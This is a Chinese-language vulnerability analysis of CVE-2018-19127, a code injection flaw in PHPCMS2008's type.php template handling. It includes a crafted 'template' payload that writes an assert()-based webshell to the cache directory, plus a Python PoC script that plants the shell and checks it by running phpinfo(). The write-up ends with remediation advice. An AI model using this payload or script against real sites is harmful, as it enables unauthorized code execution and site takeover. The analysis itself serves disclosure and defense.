描述:
近日,互联网爆出PHPCMS2008代码注入漏洞(CVE-2018-19127)。攻击者利用该漏洞,可在未授权的情况下实现对网站文件的写入。该漏洞危害程度为高危(High)。目前,漏洞利用原理已公开,厂商已发布新版本修复此漏洞。
影响范围:
PHPCMS2008 sp4及以下版本
虽然距离PHPCMS2008版本的推出已经10年,但仍有不少网站正在使用PHPCMS2008,包括政府、企业的网站;根据Fofa网络空间安全搜索引擎的全网精确搜索结果显示,还有近200个使用PHPCMS2008版本的网站;而如果使用模糊匹配对网站进行识别,匹配结果更达上万个。
通过利用该漏洞,攻击者在向路径可控的文件写入恶意脚本代码后,后续将能够向该文件发送webshell指令,在服务器上执行任意代码,因此该代码注入漏洞的影响较大。
漏洞分析:
在type.php中:
包含/include/common.inc.php 其作用是对$_GET,$_POST等全局变量进行注册。
PHP extract() 函数:
extract() 函数从数组中将变量导入到当前的符号表。
该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。
第二个参数 type 用于指定当某个变量已经存在,而数组中又有同名元素时,extract() 函数如何对待这样的冲突。
该函数返回成功导入到符号表中的变量数目。
EXTR_SKIP -如果有冲突,不覆盖已有的变量。
如:
<?php
$a = "Original";
$my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse");
extract($my_array);
echo "\$a = $a; \$b = $b; \$c = $c";
?>
结果
$a = Cat; $b = Dog; $c = Horse
在type.php第31行调用template函数
在/include/global.func.php文件中定义,包含如下代码:
function template($module = 'phpcms', $template = 'index', $istag = 0)
{
$compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';
if(TPL_REFRESH && (!file_exists($compiledtplfile) || @filemtime(TPL_ROOT.TPL_NAME.'/'.$module.'/'.$template.'.html') > @filemtime($compiledtplfile) || @filemtime(TPL_ROOT.TPL_NAME.'/tag.inc.php') > @filemtime($compiledtplfile)))
{
require_once PHPCMS_ROOT.'include/template.func.php';
template_compile($module, $template, $istag);
}
return $compiledtplfile;
}
不难看出,这里会继续调用/include/template.func.php中的template_compile();
<?php
function template_compile($module, $template, $istag = 0)
{
$tplfile = TPL_ROOT.TPL_NAME.'/'.$module.'/'.$template.'.html';
$content = @file_get_contents($tplfile);
if($content === false) showmessage("$tplfile is not exists!");
$compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';
$content = ($istag || substr($template, 0, 4) == 'tag_') ? '<?php function _tag_'.$module.'_'.$template.'($data, $number, $rows, $count, $page, $pages, $setting){ global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?>'.template_parse($content, 1).'<?php } ?>' : template_parse($content);
$strlen = file_put_contents($compiledtplfile, $content);
@chmod($compiledtplfile, 0777);
return $strlen;
}
在这个方法中,$template变量同时被用于$compiledtplfile中文件路径的生成,和$content中文件内容的生成。而$content变量当我们的输入为template=tag(){};@unlink(FILE);assert($_POST[1]);{//../rss自然会选择前者,而content内容中$template变量可控,最后file_put_contents函数写入任意代码
而攻击payload将$template变量被设置为如下的值:
tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss
所以在template_compile()方法中,调用file_put_contents()函数时的第一个参数就被写成了
data/cache_template/phpcms_tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss.tpl.php
需要注意的是,file_put_contents路径为data/cache_template/phpcms_tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss.tpl.php
php会将其路径解析为data/cache_template/rss.tpl.php。
漏洞复现:
下载phpcms2008并安装
构造payload:
template=tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss
插入内容,然后打开源码会发现在phpcms\data\cache_template下多了个rss.tpl.php文件
然后打开
会看到成功插入的内容
访问网站可以利用成功:
根据上述复现步骤和思路编写检测和利用poc(根据别人修改)
import HackRequests
import sys
def poc(arg, **kwargs):
payload = r'''/type.php?template=tag_(){};@unlink(FILE);assert($_GET[1]);{//../rss'''
hh = HackRequests.http(arg + payload)
data = {'1':'phpinfo()'}
shell_url = arg + '/data/cache_template/rss.tpl.php'
r = HackRequests.http(shell_url,post = data)
if r.status_code == 200 and 'allow_url_fopen' in r.text():
result = {
"name": "phpcms_2008 rce", # 插件名称
"content": "漏洞存在!攻击者利用该漏洞,可在未授权的情况下实现对网站文件的写入。该漏洞危害程度为高危(High)。", # 插件返回内容详情,会造成什么后果。
"url": shell_url, # 漏洞存在url
"log": hh.log,
"tag": "rce" # 漏洞标签
}
print(result['content']+'\n'+'shell地址:'+result['url'])
if __name__=='__main__':
if len(sys.argv)!=2:
print('>>>>>>>>>>>python poc.py url<<<<<<<<<<<<<<')
sys.exit(-1)
else:
url=sys.argv[1]
poc(url)
漏洞修复:
临时解决可以在/type.php文件中对$template变量进行过滤,避免用户输入的含有”(“、”{“等符号的内容混入,并被当做路径和脚本内容处理。
但由于PHPCMS2008版本过旧,用户应尽量升级到最新版本的PHPCMS,才能够更好地保障安全。
参考:
https://www.freebuf.com/vuls/190631.html
http://www.cnblogs.com/ichunqiu/p/10039579.html
